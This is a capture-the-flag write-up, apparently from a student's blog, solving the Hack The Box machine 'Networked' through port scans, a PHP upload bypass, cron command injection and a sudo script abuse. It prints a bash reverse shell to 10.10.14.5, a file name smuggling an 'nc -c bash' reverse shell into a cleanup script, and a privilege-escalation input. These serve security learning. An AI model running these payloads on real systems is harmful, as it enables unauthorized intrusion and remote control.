This page looks best with JavaScript enabled

Hackthebox - Networked

 ·  ☕ 4 min read  ·  👤 Hong
Hackthebox - Networked

Enumeration

1
2
3
4
5
6

nmap -p- -vv 10.10.10.146 -oN networked_allPort_scan.txt

PORT    STATE  SERVICE REASON
22/tcp  open   ssh     syn-ack ttl 63
80/tcp  open   http    syn-ack ttl 63
443/tcp closed https   reset ttl 63

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

nmap -sV -sC -p 22,80,443 10.10.10.146 -oN networked_specific_scan.txt

PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73💿a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
443/tcp closed https

Directory Enumeration

1

gobuster dir --url http://10.10.10.146/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt

1
2
3
4
5
6

/index.php            (Status: 200) [Size: 229]
/uploads              (Status: 301) [Size: 236] [--> http://10.10.10.146/uploads/]
/photos.php           (Status: 200) [Size: 1302]                                  
/upload.php           (Status: 200) [Size: 169]                                   
/lib.php              (Status: 200) [Size: 0]                                     
/backup               (Status: 301) [Size: 235] [--> http://10.10.10.146/backup/]

Exploitation

  • To see the interaction with the server we can use grep
1

grep -Ri '$_' *

1
2
3
4
5
6
7
8

lib.php:<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" enctype="multipart/form-data">
photos.php:  if ((strpos($exploded[0], '10_10_') === 0) && (!($prefix === $_SERVER["REMOTE_ADDR"])) ) {
upload.php:if( isset($_POST['submit']) ) {
upload.php:  if (!empty($_FILES["myFile"])) {
upload.php:    $myFile = $_FILES["myFile"];
upload.php:    if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
upload.php:    //$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];
upload.php:    $name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;
  • The code lib.php explains that the file type has to be an image type. I searched what was $mime_type, which indicates the nature and format of a document, or assortment of bytes.

  • By inspecting the element we can see the uploaded image is in the uploads/10_10_14_5.jpeg
  • Inject php script into the jpeg image and add the double extension to the file .php.jpeg

  • Going into the uploaded file http://10.10.10.146/uploads/10_10_14_5.php.jpeg

  • /uploads/10_10_14_5.php.jpeg?cmd=whoami

  • Use a bash reverse shell: bash -i >& /dev/tcp/10.10.14.5/1234 0>&1
  • Highlight the payload an CTRL + u to url encode and send the payload
  • Start netcat listener

Interactive shell

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

which python

python -c 'import pty; pty.spawn("/bin/bash")'

CTRL + Z 

stty raw -echo
fg
[Press Enter]

export TERM=screen
  • Cannot read user.txt file need to transfer privilege to user guly
  • There is a crontab running

1

bash-4.2$ cat check_attack.php 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
	$msg='';
  if ($value == 'index.html') {
	continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>
  • The script is going to iterate through the files in /var/www/html/uploads and it is going to execute system commands /bin/rm and it is going to remove the contents in $value which contains the images
  • We can abuse the command rm -f $path$value. If we have text file and apply the command rm -f ./test.txt; whoami This will delete the file but will execute the whoami command

  • We could make a file with a reverse shell
1
2
3
4
5

cd /var/www/html/uploads

touch '; nc -c bash 10.10.14.5 4321' # [-c] Executes the given command via //bin/sh

nc -lvnp 4321

Privilege Escalation

  • I did further scan with linpeas and found that user guly can run as root /usr/local/sbin/changename.sh

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

cat changename.sh 

#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
	echo "interface $var:"
	read x
	while [[ ! $x =~ $regexp ]]; do
		echo "wrong input, try again"
		echo "interface $var:"
		read x
	done
	echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

cat /etc/os-release

NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"

CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"

1

sudo /usr/local/sbin/changename.sh

1
2
3
4
5
6
7
8
9

[guly@networked sbin]$ sudo /usr/local/sbin/changename.sh 
interface NAME:
test /bin/bash
interface PROXY_METHOD:
test /bin/bash
interface BROWSER_ONLY:
test /bin/bash
interface BOOTPROTO:
test /bin/bash

Skills Learned

  • File upload bypass
  • Command injection
Hong Woo
WRITTEN BY
Hong
📚Cybersecurity Student🚩CTF Player☁️Cloud Computing

See Also

©2023, All Rights Reserved